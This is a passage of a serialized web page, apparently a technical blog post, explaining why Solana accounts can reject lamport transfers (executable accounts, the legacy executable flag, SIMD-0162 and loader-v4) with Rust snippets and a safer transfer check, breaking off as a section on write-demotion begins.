lamports",{"type":27,"tag":207,"props":80435,"children":80436},{"style":226},[80437],{"type":33,"value":4695},{"type":27,"tag":207,"props":80439,"children":80440},{"style":214},[80441],{"type":33,"value":21073},{"type":27,"tag":207,"props":80443,"children":80444},{"style":226},[80445],{"type":33,"value":1041},{"type":27,"tag":207,"props":80447,"children":80448},{"style":1335},[80449],{"type":33,"value":80450},"get_lamports",{"type":27,"tag":207,"props":80452,"children":80453},{"style":238},[80454],{"type":33,"value":23011},{"type":27,"tag":207,"props":80456,"children":80457},{"class":209,"line":867},[80458,80462,80466,80470,80474,80478,80483],{"type":27,"tag":207,"props":80459,"children":80460},{"style":376},[80461],{"type":33,"value":23019},{"type":27,"tag":207,"props":80463,"children":80464},{"style":8920},[80465],{"type":33,"value":23024},{"type":27,"tag":207,"props":80467,"children":80468},{"style":238},[80469],{"type":33,"value":1343},{"type":27,"tag":207,"props":80471,"children":80472},{"style":8920},[80473],{"type":33,"value":23033},{"type":27,"tag":207,"props":80475,"children":80476},{"style":226},[80477],{"type":33,"value":10768},{"type":27,"tag":207,"props":80479,"children":80480},{"style":8920},[80481],{"type":33,"value":80482},"ExternalAccountLamportSpend",{"type":27,"tag":207,"props":80484,"children":80485},{"style":238},[80486],{"type":33,"value":1455},{"type":27,"tag":207,"props":80488,"children":80489},{"class":209,"line":892},[80490],{"type":27,"tag":207,"props":80491,"children":80492},{"style":238},[80493],{"type":33,"value":10645},{"type":27,"tag":207,"props":80495,"children":80496},{"class":209,"line":1475},[80497],{"type":27,"tag":207,"props":80498,"children":80499},{"style":4647},[80500],{"type":33,"value":80501}," // The balance of read-only may not change\n",{"type":27,"tag":207,"props":80503,"children":80504},{"class":209,"line":2065},[80505,80509,80513,80517,80521,80526],{"type":27,"tag":207,"props":80506,"children":80507},{"style":376},[80508],{"type":33,"value":19556},{"type":27,"tag":207,"props":80510,"children":80511},{"style":226},[80512],{"type":33,"value":20141},{"type":27,"tag":207,"props":80514,"children":80515},{"style":214},[80516],{"type":33,"value":20990},{"type":27,"tag":207,"props":80518,"children":80519},{"style":226},[80520],{"type":33,"value":1041},{"type":27,"tag":207,"props":80522,"children":80523},{"style":1335},[80524],{"type":33,"value":80525},"is_writable",{"type":27,"tag":207,"props":80527,"children":80528},{"style":238},[80529],{"type":33,"value":23011},{"type":27,"tag":207,"props":80531,"children":80532},{"class":209,"line":2092},[80533,80537,80541,80545,80549,80553,80558],{"type":27,"tag":207,"props":80534,"children":80535},{"style":376},[80536],{"type":33,"value":23019},{"type":27,"tag":207,"props":80538,"children":80539},{"style":8920},[80540],{"type":33,"value":23024},{"type":27,"tag":207,"props":80542,"children":80543},{"style":238},[80544],{"type":33,"value":1343},{"type":27,"tag":207,"props":80546,"children":80547},{"style":8920},[80548],{"type":33,"value":23033},{"type":27,"tag":207,"props":80550,"children":80551},{"style":226},[80552],{"type":33,"value":10768},{"type":27,"tag":207,"props":80554,"children":80555},{"style":8920},[80556],{"type":33,"value":80557},"ReadonlyLamportChange",{"type":27,"tag":207,"props":80559,"children":80560},{"style":238},[80561],{"type":33,"value":1455},{"type":27,"tag":207,"props":80563,"children":80564},{"class":209,"line":2130},[80565],{"type":27,"tag":207,"props":80566,"children":80567},{"style":238},[80568],{"type":33,"value":10645},{"type":27,"tag":207,"props":80570,"children":80571},{"class":209,"line":2168},[80572],{"type":27,"tag":207,"props":80573,"children":80574},{"style":4647},[80575],{"type":33,"value":80576}," // The balance of executable accounts may not change\n",{"type":27,"tag":207,"props":80578,"children":80579},{"class":209,"line":4095},[80580,80584,80588,80592,80597],{"type":27,"tag":207,"props":80581,"children":80582},{"style":376},[80583],{"type":33,"value":19556},{"type":27,"tag":207,"props":80585,"children":80586},{"style":214},[80587],{"type":33,"value":21073},{"type":27,"tag":207,"props":80589,"children":80590},{"style":226},[80591],{"type":33,"value":1041},{"type":27,"tag":207,"props":80593,"children":80594},{"style":1335},[80595],{"type":33,"value":80596},"is_executable_internal",{"type":27,"tag":207,"props":80598,"children":80599},{"style":238},[80600],{"type":33,"value":23011},{"type":27,"tag":207,"props":80602,"children":80603},{"class":209,"line":4103},[80604,80608,80612,80616,80620,80624,80629],{"type":27,"tag":207,"props":80605,"children":80606},{"style":376},[80607],{"type":33,"value":23019},{"type":27,"tag":207,"props":80609,"children":80610},{"style":8920},[80611],{"type":33,"value":23024},{"type":27,"tag":207,"props":80613,"children":80614},{"style":238},[80615],{"type":33,"value":1343},{"type":27,"tag":207,"props":80617,"children":80618},{"style":8920},[80619],{"type":33,"value":23033},{"type":27,"tag":207,"props":80621,"children":80622},{"style":226},[80623],{"type":33,"value":10768},{"type":27,"tag":207,"props":80625,"children":80626},{"style":8920},[80627],{"type":33,"value":80628},"ExecutableLamportChange",{"type":27,"tag":207,"props":80630,"children":80631},{"style":238},[80632],{"type":33,"value":1455},{"type":27,"tag":207,"props":80634,"children":80635},{"class":209,"line":4154},[80636],{"type":27,"tag":207,"props":80637,"children":80638},{"style":238},[80639],{"type":33,"value":10645},{"type":27,"tag":207,"props":80641,"children":80642},{"class":209,"line":4203},[80643],{"type":27,"tag":207,"props":80644,"children":80645},{"style":4647},[80646],{"type":33,"value":80647}," // don't touch the account if the lamports do not change\n",{"type":27,"tag":207,"props":80649,"children":80650},{"class":209,"line":4249},[80651,80655,80659,80663,80667,80671,80675,80679],{"type":27,"tag":207,"props":80652,"children":80653},{"style":376},[80654],{"type":33,"value":19556},{"type":27,"tag":207,"props":80656,"children":80657},{"style":214},[80658],{"type":33,"value":21073},{"type":27,"tag":207,"props":80660,"children":80661},{"style":226},[80662],{"type":33,"value":1041},{"type":27,"tag":207,"props":80664,"children":80665},{"style":1335},[80666],{"type":33,"value":80450},{"type":27,"tag":207,"props":80668,"children":80669},{"style":238},[80670],{"type":33,"value":21319},{"type":27,"tag":207,"props":80672,"children":80673},{"style":226},[80674],{"type":33,"value":15856},{"type":27,"tag":207,"props":80676,"children":80677},{"style":220},[80678],{"type":33,"value":80433},{"type":27,"tag":207,"props":80680,"children":80681},{"style":238},[80682],{"type":33,"value":384},{"type":27,"tag":207,"props":80684,"children":80685},{"class":209,"line":4290},[80686,80690,80694],{"type":27,"tag":207,"props":80687,"children":80688},{"style":376},[80689],{"type":33,"value":23019},{"type":27,"tag":207,"props":80691,"children":80692},{"style":8920},[80693],{"type":33,"value":50182},{"type":27,"tag":207,"props":80695,"children":80696},{"style":238},[80697],{"type":33,"value":80698},"(());\n",{"type":27,"tag":207,"props":80700,"children":80701},{"class":209,"line":4304},[80702],{"type":27,"tag":207,"props":80703,"children":80704},{"style":238},[80705],{"type":33,"value":10645},{"type":27,"tag":207,"props":80707,"children":80708},{"class":209,"line":5466},[80709,80713,80717,80722,80726,80730],{"type":27,"tag":207,"props":80710,"children":80711},{"style":214},[80712],{"type":33,"value":28058},{"type":27,"tag":207,"props":80714,"children":80715},{"style":226},[80716],{"type":33,"value":1041},{"type":27,"tag":207,"props":80718,"children":80719},{"style":1335},[80720],{"type":33,"value":80721},"touch",{"type":27,"tag":207,"props":80723,"children":80724},{"style":238},[80725],{"type":33,"value":21155},{"type":27,"tag":207,"props":80727,"children":80728},{"style":226},[80729],{"type":33,"value":10444},{"type":27,"tag":207,"props":80731,"children":80732},{"style":238},[80733],{"type":33,"value":241},{"type":27,"tag":207,"props":80735,"children":80736},{"class":209,"line":5530},[80737,80741,80745,80749,80753,80757,80761,80765],{"type":27,"tag":207,"props":80738,"children":80739},{"style":214},[80740],{"type":33,"value":28058},{"type":27,"tag":207,"props":80742,"children":80743},{"style":226},[80744],{"type":33,"value":1041},{"type":27,"tag":207,"props":80746,"children":80747},{"style":238},[80748],{"type":33,"value":20230},{"type":27,"tag":207,"props":80750,"children":80751},{"style":226},[80752],{"type":33,"value":1041},{"type":27,"tag":207,"props":80754,"children":80755},{"style":1335},[80756],{"type":33,"value":80264},{"type":27,"tag":207,"props":80758,"children":80759},{"style":238},[80760],{"type":33,"value":1343},{"type":27,"tag":207,"props":80762,"children":80763},{"style":220},[80764],{"type":33,"value":22787},{"type":27,"tag":207,"props":80766,"children":80767},{"style":238},[80768],{"type":33,"value":1455},{"type":27,"tag":207,"props":80770,"children":80771},{"class":209,"line":7900},[80772,80776],{"type":27,"tag":207,"props":80773,"children":80774},{"style":8920},[80775],{"type":33,"value":21609},{"type":27,"tag":207,"props":80777,"children":80778},{"style":238},[80779],{"type":33,"value":21614},{"type":27,"tag":207,"props":80781,"children":80782},{"class":209,"line":7909},[80783],{"type":27,"tag":207,"props":80784,"children":80785},{"style":238},[80786],{"type":33,"value":451},{"type":27,"tag":207,"props":80788,"children":80789},{"class":209,"line":7917},[80790],{"type":27,"tag":207,"props":80791,"children":80792},{"emptyLinePlaceholder":19},[80793],{"type":33,"value":2062},{"type":27,"tag":207,"props":80795,"children":80796},{"class":209,"line":7926},[80797],{"type":27,"tag":207,"props":80798,"children":80799},{"style":4647},[80800],{"type":33,"value":80801},"/// Feature gating to remove `is_executable` flag related checks\n",{"type":27,"tag":207,"props":80803,"children":80804},{"class":209,"line":7934},[80805,80809,80813,80817],{"type":27,"tag":207,"props":80806,"children":80807},{"style":238},[80808],{"type":33,"value":80302},{"type":27,"tag":207,"props":80810,"children":80811},{"style":226},[80812],{"type":33,"value":10380},{"type":27,"tag":207,"props":80814,"children":80815},{"style":1325},[80816],{"type":33,"value":80311},{"type":27,"tag":207,"props":80818,"children":80819},{"style":238},[80820],{"type":33,"value":27880},{"type":27,"tag":207,"props":80822,"children":80823},{"class":209,"line":7943},[80824],{"type":27,"tag":207,"props":80825,"children":80826},{"style":238},[80827],{"type":33,"value":80828},"#[inline]\n",{"type":27,"tag":207,"props":80830,"children":80831},{"class":209,"line":7952},[80832,80836,80841,80845,80849,80853,80857,80861,80865],{"type":27,"tag":207,"props":80833,"children":80834},{"style":214},[80835],{"type":33,"value":27538},{"type":27,"tag":207,"props":80837,"children":80838},{"style":1335},[80839],{"type":33,"value":80840}," is_executable_internal",{"type":27,"tag":207,"props":80842,"children":80843},{"style":238},[80844],{"type":33,"value":1343},{"type":27,"tag":207,"props":80846,"children":80847},{"style":226},[80848],{"type":33,"value":10398},{"type":27,"tag":207,"props":80850,"children":80851},{"style":214},[80852],{"type":33,"value":20990},{"type":27,"tag":207,"props":80854,"children":80855},{"style":238},[80856],{"type":33,"value":2222},{"type":27,"tag":207,"props":80858,"children":80859},{"style":226},[80860],{"type":33,"value":8968},{"type":27,"tag":207,"props":80862,"children":80863},{"style":8920},[80864],{"type":33,"value":19327},{"type":27,"tag":207,"props":80866,"children":80867},{"style":238},[80868],{"type":33,"value":384},{"type":27,"tag":207,"props":80870,"children":80871},{"class":209,"line":7961},[80872,80876],{"type":27,"tag":207,"props":80873,"children":80874},{"style":226},[80875],{"type":33,"value":28242},{"type":27,"tag":207,"props":80877,"children":80878},{"style":214},[80879],{"type":33,"value":80880},"self\n",{"type":27,"tag":207,"props":80882,"children":80883},{"class":209,"line":7969},[80884,80888],{"type":27,"tag":207,"props":80885,"children":80886},{"style":226},[80887],{"type":33,"value":75493},{"type":27,"tag":207,"props":80889,"children":80890},{"style":238},[80891],{"type":33,"value":80892},"transaction_context\n",{"type":27,"tag":207,"props":80894,"children":80895},{"class":209,"line":7978},[80896,80900],{"type":27,"tag":207,"props":80897,"children":80898},{"style":226},[80899],{"type":33,"value":75493},{"type":27,"tag":207,"props":80901,"children":80902},{"style":238},[80903],{"type":33,"value":80904},"remove_accounts_executable_flag_checks\n",{"type":27,"tag":207,"props":80906,"children":80907},{"class":209,"line":7987},[80908,80912,80916,80920,80924,80928,80932],{"type":27,"tag":207,"props":80909,"children":80910},{"style":226},[80911],{"type":33,"value":50046},{"type":27,"tag":207,"props":80913,"children":80914},{"style":214},[80915],{"type":33,"value":21073},{"type":27,"tag":207,"props":80917,"children":80918},{"style":226},[80919],{"type":33,"value":1041},{"type":27,"tag":207,"props":80921,"children":80922},{"style":238},[80923],{"type":33,"value":20230},{"type":27,"tag":207,"props":80925,"children":80926},{"style":226},[80927],{"type":33,"value":1041},{"type":27,"tag":207,"props":80929,"children":80930},{"style":1335},[80931],{"type":33,"value":22930},{"type":27,"tag":207,"props":80933,"children":80934},{"style":238},[80935],{"type":33,"value":15018},{"type":27,"tag":207,"props":80937,"children":80938},{"class":209,"line":7996},[80939],{"type":27,"tag":207,"props":80940,"children":80941},{"style":238},[80942],{"type":33,"value":451},{"type":27,"tag":36,"props":80944,"children":80945},{},[80946],{"type":33,"value":80947},"Turns out: even writable, rent-exempt accounts can still reject lamport transfers.",{"type":27,"tag":36,"props":80949,"children":80950},{},[80951,80953,80958],{"type":33,"value":80952},"Specifically, ",{"type":27,"tag":12606,"props":80954,"children":80955},{},[80956],{"type":33,"value":80957},"executable accounts",{"type":33,"value":80959}," cannot receive or send lamports — the runtime treats them as immutable.",{"type":27,"tag":26163,"props":80961,"children":80963},{"id":80962},"sidebar-whats-the-executable-flag-anyway",[80964],{"type":33,"value":80965},"Sidebar: What's the executable Flag Anyway?",{"type":27,"tag":36,"props":80967,"children":80968},{},[80969,80970,80975],{"type":33,"value":23888},{"type":27,"tag":84,"props":80971,"children":80973},{"className":80972},[],[80974],{"type":33,"value":22930},{"type":33,"value":80976}," flag is a legacy mechanism marking accounts that hold program code. Historically, an account with this flag was assumed to either contain immutable BPF bytecode or was a proxy to a built-in program, and therefore it made sense to consider it read-only for performance reasons.",{"type":27,"tag":36,"props":80978,"children":80979},{},[80980,80982,80987],{"type":33,"value":80981},"This behavior became problematic with the introduction of the ",{"type":27,"tag":12606,"props":80983,"children":80984},{},[80985],{"type":33,"value":80986},"Upgradeable BPF Loader",{"type":33,"value":80988},". A workaround was used to maintain compatibility with the existing runtime logic. The program data containing bpf bytecode was split into a separate account, ProgramData, with the program account now only containing an address pointing to the ProgramData account:",{"type":27,"tag":101,"props":80990,"children":80992},{"className":10270,"code":80991,"language":10269,"meta":7,"style":7},"Program {\n /// Address of the ProgramData account.\n programdata_address: Pubkey,\n},\nProgramData {\n /// Slot that the program was last modified.\n slot: u64,\n /// Address of the Program's upgrade authority.\n upgrade_authority_address: Option\u003CPubkey>,\n // The raw program data follows this serialized structure in the\n // account's data.\n},\n",[80993],{"type":27,"tag":84,"props":80994,"children":80995},{"__ignoreMap":7},[80996,81008,81016,81036,81044,81056,81064,81084,81092,81120,81128,81136],{"type":27,"tag":207,"props":80997,"children":80998},{"class":209,"line":210},[80999,81004],{"type":27,"tag":207,"props":81000,"children":81001},{"style":8920},[81002],{"type":33,"value":81003},"Program",{"type":27,"tag":207,"props":81005,"children":81006},{"style":238},[81007],{"type":33,"value":384},{"type":27,"tag":207,"props":81009,"children":81010},{"class":209,"line":244},[81011],{"type":27,"tag":207,"props":81012,"children":81013},{"style":4647},[81014],{"type":33,"value":81015}," /// Address of the ProgramData account.\n",{"type":27,"tag":207,"props":81017,"children":81018},{"class":209,"line":270},[81019,81024,81028,81032],{"type":27,"tag":207,"props":81020,"children":81021},{"style":220},[81022],{"type":33,"value":81023}," programdata_address",{"type":27,"tag":207,"props":81025,"children":81026},{"style":226},[81027],{"type":33,"value":736},{"type":27,"tag":207,"props":81029,"children":81030},{"style":8920},[81031],{"type":33,"value":28129},{"type":27,"tag":207,"props":81033,"children":81034},{"style":238},[81035],{"type":33,"value":1842},{"type":27,"tag":207,"props":81037,"children":81038},{"class":209,"line":296},[81039],{"type":27,"tag":207,"props":81040,"children":81041},{"style":238},[81042],{"type":33,"value":81043},"},\n",{"type":27,"tag":207,"props":81045,"children":81046},{"class":209,"line":445},[81047,81052],{"type":27,"tag":207,"props":81048,"children":81049},{"style":8920},[81050],{"type":33,"value":81051},"ProgramData",{"type":27,"tag":207,"props":81053,"children":81054},{"style":238},[81055],{"type":33,"value":384},{"type":27,"tag":207,"props":81057,"children":81058},{"class":209,"line":867},[81059],{"type":27,"tag":207,"props":81060,"children":81061},{"style":4647},[81062],{"type":33,"value":81063}," /// Slot that the program was last modified.\n",{"type":27,"tag":207,"props":81065,"children":81066},{"class":209,"line":892},[81067,81072,81076,81080],{"type":27,"tag":207,"props":81068,"children":81069},{"style":220},[81070],{"type":33,"value":81071}," slot",{"type":27,"tag":207,"props":81073,"children":81074},{"style":226},[81075],{"type":33,"value":736},{"type":27,"tag":207,"props":81077,"children":81078},{"style":8920},[81079],{"type":33,"value":13142},{"type":27,"tag":207,"props":81081,"children":81082},{"style":238},[81083],{"type":33,"value":1842},{"type":27,"tag":207,"props":81085,"children":81086},{"class":209,"line":1475},[81087],{"type":27,"tag":207,"props":81088,"children":81089},{"style":4647},[81090],{"type":33,"value":81091}," /// Address of the Program's upgrade authority.\n",{"type":27,"tag":207,"props":81093,"children":81094},{"class":209,"line":2065},[81095,81100,81104,81108,81112,81116],{"type":27,"tag":207,"props":81096,"children":81097},{"style":220},[81098],{"type":33,"value":81099}," upgrade_authority_address",{"type":27,"tag":207,"props":81101,"children":81102},{"style":226},[81103],{"type":33,"value":736},{"type":27,"tag":207,"props":81105,"children":81106},{"style":8920},[81107],{"type":33,"value":34911},{"type":27,"tag":207,"props":81109,"children":81110},{"style":238},[81111],{"type":33,"value":9257},{"type":27,"tag":207,"props":81113,"children":81114},{"style":8920},[81115],{"type":33,"value":28670},{"type":27,"tag":207,"props":81117,"children":81118},{"style":238},[81119],{"type":33,"value":13420},{"type":27,"tag":207,"props":81121,"children":81122},{"class":209,"line":2092},[81123],{"type":27,"tag":207,"props":81124,"children":81125},{"style":4647},[81126],{"type":33,"value":81127}," // The raw program data follows this serialized structure in the\n",{"type":27,"tag":207,"props":81129,"children":81130},{"class":209,"line":2130},[81131],{"type":27,"tag":207,"props":81132,"children":81133},{"style":4647},[81134],{"type":33,"value":81135}," // account's data.\n",{"type":27,"tag":207,"props":81137,"children":81138},{"class":209,"line":2168},[81139],{"type":27,"tag":207,"props":81140,"children":81141},{"style":238},[81142],{"type":33,"value":81043},{"type":27,"tag":36,"props":81144,"children":81145},{},[81146,81148,81155],{"type":33,"value":81147},"Eventually, the executable flag will be removed entirely as proposed in ",{"type":27,"tag":47,"props":81149,"children":81152},{"href":81150,"rel":81151},"https://github.com/solana-foundation/solana-improvement-documents/blob/main/proposals/0162-remove-accounts-executable-flag-checks.md",[51],[81153],{"type":33,"value":81154},"SIMD-0162",{"type":33,"value":81156},". The reasoning is simple: an account's owner and its content are sufficient to determine if it's a valid program — the executable flag is redundant.",{"type":27,"tag":36,"props":81158,"children":81159},{},[81160,81162,81167,81169,81174],{"type":33,"value":81161},"This change is also a ",{"type":27,"tag":12606,"props":81163,"children":81164},{},[81165],{"type":33,"value":81166},"hard requirement for supporting the new loader-v4",{"type":33,"value":81168},". Unlike the upgradable loader, which relies on a separate ",{"type":27,"tag":84,"props":81170,"children":81172},{"className":81171},[],[81173],{"type":33,"value":81051},{"type":33,"value":81175}," proxy account, loader-v4 stores all program data directly in the program account itself.",{"type":27,"tag":36,"props":81177,"children":81178},{},[81179,81181,81188,81190,81195],{"type":33,"value":81180},"As a result, it becomes impossible to modify the account's size after deployment, or to ",{"type":27,"tag":47,"props":81182,"children":81185},{"href":81183,"rel":81184},"https://github.com/anza-xyz/agave/blob/7a1e57469a5b1aeed617457c0519803620ba953f/programs/bpf_loader/src/lib.rs#L1411",[51],[81186],{"type":33,"value":81187},"migrate",{"type":33,"value":81189}," from the upgradable loader to loader-v4 — without hitting the ",{"type":27,"tag":84,"props":81191,"children":81193},{"className":81192},[],[81194],{"type":33,"value":80628},{"type":33,"value":81196}," restriction.",{"type":27,"tag":26163,"props":81198,"children":81200},{"id":81199},"fix-2-reject-program-accounts",[81201],{"type":33,"value":81202},"Fix 2: Reject Program Accounts",{"type":27,"tag":36,"props":81204,"children":81205},{},[81206],{"type":33,"value":81207},"To avoid this footgun, let’s explicitly skip any executable account:",{"type":27,"tag":101,"props":81209,"children":81211},{"className":10270,"code":81210,"language":10269,"meta":7,"style":7},"pub fn can_transfer_lamports(account: &AccountInfo, lamports: u64) -> Result\u003Cbool> {\nfn is_program(account: &AccountInfo) -> bool {\n account.executable\n}\nlet rent = Rent::get()?;\nlet balance_after = account.lamports() + lamports;\nOk(account.is_writable\n && rent.is_exempt(balance_after, account.data_len())\n && !is_program(account))\n}\n",[81212],{"type":27,"tag":84,"props":81213,"children":81214},{"__ignoreMap":7},[81215,81291,81339,81355,81362,81401,81445,81469,81518,81546],{"type":27,"tag":207,"props":81216,"children":81217},{"class":209,"line":210},[81218,81222,81226,81231,81235,81239,81243,81247,81251,81255,81259,81263,81267,81271,81275,81279,81283,81287],{"type":27,"tag":207,"props":81219,"children":81220},{"style":214},[81221],{"type":33,"value":20967},{"type":27,"tag":207,"props":81223,"children":81224},{"style":214},[81225],{"type":33,"value":20972},{"type":27,"tag":207,"props":81227,"children":81228},{"style":1335},[81229],{"type":33,"value":81230}," can_transfer_lamports",{"type":27,"tag":207,"props":81232,"children":81233},{"style":238},[81234],{"type":33,"value":1343},{"type":27,"tag":207,"props":81236,"children":81237},{"style":220},[81238],{"type":33,"value":20230},{"type":27,"tag":207,"props":81240,"children":81241},{"style":226},[81242],{"type":33,"value":736},{"type":27,"tag":207,"props":81244,"children":81245},{"style":226},[81246],{"type":33,"value":14423},{"type":27,"tag":207,"props":81248,"children":81249},{"style":8920},[81250],{"type":33,"value":22213},{"type":27,"tag":207,"props":81252,"children":81253},{"style":238},[81254],{"type":33,"value":1123},{"type":27,"tag":207,"props":81256,"children":81257},{"style":220},[81258],{"type":33,"value":22787},{"type":27,"tag":207,"props":81260,"children":81261},{"style":226},[81262],{"type":33,"value":736},{"type":27,"tag":207,"props":81264,"children":81265},{"style":8920},[81266],{"type":33,"value":13142},{"type":27,"tag":207,"props":81268,"children":81269},{"style":238},[81270],{"type":33,"value":2222},{"type":27,"tag":207,"props":81272,"children":81273},{"style":226},[81274],{"type":33,"value":8968},{"type":27,"tag":207,"props":81276,"children":81277},{"style":8920},[81278],{"type":33,"value":21038},{"type":27,"tag":207,"props":81280,"children":81281},{"style":238},[81282],{"type":33,"value":9257},{"type":27,"tag":207,"props":81284,"children":81285},{"style":8920},[81286],{"type":33,"value":36947},{"type":27,"tag":207,"props":81288,"children":81289},{"style":238},[81290],{"type":33,"value":14563},{"type":27,"tag":207,"props":81292,"children":81293},{"class":209,"line":244},[81294,81298,81303,81307,81311,81315,81319,81323,81327,81331,81335],{"type":27,"tag":207,"props":81295,"children":81296},{"style":214},[81297],{"type":33,"value":27538},{"type":27,"tag":207,"props":81299,"children":81300},{"style":1335},[81301],{"type":33,"value":81302}," is_program",{"type":27,"tag":207,"props":81304,"children":81305},{"style":238},[81306],{"type":33,"value":1343},{"type":27,"tag":207,"props":81308,"children":81309},{"style":220},[81310],{"type":33,"value":20230},{"type":27,"tag":207,"props":81312,"children":81313},{"style":226},[81314],{"type":33,"value":736},{"type":27,"tag":207,"props":81316,"children":81317},{"style":226},[81318],{"type":33,"value":14423},{"type":27,"tag":207,"props":81320,"children":81321},{"style":8920},[81322],{"type":33,"value":22213},{"type":27,"tag":207,"props":81324,"children":81325},{"style":238},[81326],{"type":33,"value":2222},{"type":27,"tag":207,"props":81328,"children":81329},{"style":226},[81330],{"type":33,"value":8968},{"type":27,"tag":207,"props":81332,"children":81333},{"style":8920},[81334],{"type":33,"value":19327},{"type":27,"tag":207,"props":81336,"children":81337},{"style":238},[81338],{"type":33,"value":384},{"type":27,"tag":207,"props":81340,"children":81341},{"class":209,"line":270},[81342,81346,81350],{"type":27,"tag":207,"props":81343,"children":81344},{"style":220},[81345],{"type":33,"value":32436},{"type":27,"tag":207,"props":81347,"children":81348},{"style":226},[81349],{"type":33,"value":1041},{"type":27,"tag":207,"props":81351,"children":81352},{"style":238},[81353],{"type":33,"value":81354},"executable\n",{"type":27,"tag":207,"props":81356,"children":81357},{"class":209,"line":296},[81358],{"type":27,"tag":207,"props":81359,"children":81360},{"style":238},[81361],{"type":33,"value":451},{"type":27,"tag":207,"props":81363,"children":81364},{"class":209,"line":445},[81365,81369,81373,81377,81381,81385,81389,81393,81397],{"type":27,"tag":207,"props":81366,"children":81367},{"style":214},[81368],{"type":33,"value":217},{"type":27,"tag":207,"props":81370,"children":81371},{"style":220},[81372],{"type":33,"value":80122},{"type":27,"tag":207,"props":81374,"children":81375},{"style":226},[81376],{"type":33,"value":229},{"type":27,"tag":207,"props":81378,"children":81379},{"style":8920},[81380],{"type":33,"value":50717},{"type":27,"tag":207,"props":81382,"children":81383},{"style":226},[81384],{"type":33,"value":10768},{"type":27,"tag":207,"props":81386,"children":81387},{"style":1335},[81388],{"type":33,"value":23627},{"type":27,"tag":207,"props":81390,"children":81391},{"style":238},[81392],{"type":33,"value":21155},{"type":27,"tag":207,"props":81394,"children":81395},{"style":226},[81396],{"type":33,"value":10444},{"type":27,"tag":207,"props":81398,"children":81399},{"style":238},[81400],{"type":33,"value":241},{"type":27,"tag":207,"props":81402,"children":81403},{"class":209,"line":867},[81404,81408,81413,81417,81421,81425,81429,81433,81437,81441],{"type":27,"tag":207,"props":81405,"children":81406},{"style":214},[81407],{"type":33,"value":217},{"type":27,"tag":207,"props":81409,"children":81410},{"style":220},[81411],{"type":33,"value":81412}," balance_after",{"type":27,"tag":207,"props":81414,"children":81415},{"style":226},[81416],{"type":33,"value":229},{"type":27,"tag":207,"props":81418,"children":81419},{"style":220},[81420],{"type":33,"value":12765},{"type":27,"tag":207,"props":81422,"children":81423},{"style":226},[81424],{"type":33,"value":1041},{"type":27,"tag":207,"props":81426,"children":81427},{"style":1335},[81428],{"type":33,"value":22787},{"type":27,"tag":207,"props":81430,"children":81431},{"style":238},[81432],{"type":33,"value":21319},{"type":27,"tag":207,"props":81434,"children":81435},{"style":226},[81436],{"type":33,"value":2227},{"type":27,"tag":207,"props":81438,"children":81439},{"style":220},[81440],{"type":33,"value":80433},{"type":27,"tag":207,"props":81442,"children":81443},{"style":238},[81444],{"type":33,"value":241},{"type":27,"tag":207,"props":81446,"children":81447},{"class":209,"line":892},[81448,81452,81456,81460,81464],{"type":27,"tag":207,"props":81449,"children":81450},{"style":8920},[81451],{"type":33,"value":27761},{"type":27,"tag":207,"props":81453,"children":81454},{"style":238},[81455],{"type":33,"value":1343},{"type":27,"tag":207,"props":81457,"children":81458},{"style":220},[81459],{"type":33,"value":20230},{"type":27,"tag":207,"props":81461,"children":81462},{"style":226},[81463],{"type":33,"value":1041},{"type":27,"tag":207,"props":81465,"children":81466},{"style":238},[81467],{"type":33,"value":81468},"is_writable\n",{"type":27,"tag":207,"props":81470,"children":81471},{"class":209,"line":1475},[81472,81476,81480,81484,81489,81493,81498,81502,81506,81510,81514],{"type":27,"tag":207,"props":81473,"children":81474},{"style":226},[81475],{"type":33,"value":22896},{"type":27,"tag":207,"props":81477,"children":81478},{"style":220},[81479],{"type":33,"value":80122},{"type":27,"tag":207,"props":81481,"children":81482},{"style":226},[81483],{"type":33,"value":1041},{"type":27,"tag":207,"props":81485,"children":81486},{"style":1335},[81487],{"type":33,"value":81488},"is_exempt",{"type":27,"tag":207,"props":81490,"children":81491},{"style":238},[81492],{"type":33,"value":1343},{"type":27,"tag":207,"props":81494,"children":81495},{"style":220},[81496],{"type":33,"value":81497},"balance_after",{"type":27,"tag":207,"props":81499,"children":81500},{"style":238},[81501],{"type":33,"value":1123},{"type":27,"tag":207,"props":81503,"children":81504},{"style":220},[81505],{"type":33,"value":20230},{"type":27,"tag":207,"props":81507,"children":81508},{"style":226},[81509],{"type":33,"value":1041},{"type":27,"tag":207,"props":81511,"children":81512},{"style":1335},[81513],{"type":33,"value":21082},{"type":27,"tag":207,"props":81515,"children":81516},{"style":238},[81517],{"type":33,"value":22935},{"type":27,"tag":207,"props":81519,"children":81520},{"class":209,"line":2065},[81521,81525,81529,81534,81538,81542],{"type":27,"tag":207,"props":81522,"children":81523},{"style":226},[81524],{"type":33,"value":22896},{"type":27,"tag":207,"props":81526,"children":81527},{"style":226},[81528],{"type":33,"value":20141},{"type":27,"tag":207,"props":81530,"children":81531},{"style":1335},[81532],{"type":33,"value":81533},"is_program",{"type":27,"tag":207,"props":81535,"children":81536},{"style":238},[81537],{"type":33,"value":1343},{"type":27,"tag":207,"props":81539,"children":81540},{"style":220},[81541],{"type":33,"value":20230},{"type":27,"tag":207,"props":81543,"children":81544},{"style":238},[81545],{"type":33,"value":26983},{"type":27,"tag":207,"props":81547,"children":81548},{"class":209,"line":2092},[81549],{"type":27,"tag":207,"props":81550,"children":81551},{"style":238},[81552],{"type":33,"value":451},{"type":27,"tag":36,"props":81554,"children":81555},{},[81556],{"type":33,"value":81557},"Now we’re safe...right?",{"type":27,"tag":58,"props":81559,"children":81561},{"id":81560},"bug-3-the-write-demotion-trap",[81562],{"type":33,"value":81563},"Bug 3: The Write-Demotion Trap",{"type":27,"tag":36,"props":81565,"children":81566},{},[81567,81569,81574,81576,81581],{"type":33,"value":81568},"On Solana, accounts passed as ",{"type":27,"tag":12606,"props":81570,"children":81571},{},[81572],{"type":33,"value":81573},"writable",{"type":33,"value":81575}," in a transaction can be ",{"type":27,"tag":12606,"props":81577,"children":81578},{},[81579],{"type":33,"value":81580},"silently downgraded to read-only",{"type":33,"value":81582},". This behavior occurs during message sanitization — even before your program runs.",{"type":27,"tag":36,"props":81584,"children":81585},{},[81586,81588,81595],{"type":33,"value":81587},"Let’s walk through the logic for legacy messages (note: the same rules apply to ",{"type":27,"tag":47,"props":81589,"children":81592},{"href":81590,"rel":81591},"https://github.com/anza-xyz/solana-sdk/blob/master/message/src/versions/v0/loaded.rs#L58-L98",[51],[81593],{"type":33,"value":81594},"MessageV0",{"type":33,"value":81596},", but legacy is simpler to follow):",{"type":27,"tag":101,"props":81598,"children":81600},{"className":10270,"code":81599,"language":10269,"meta":7,"style":7},"// 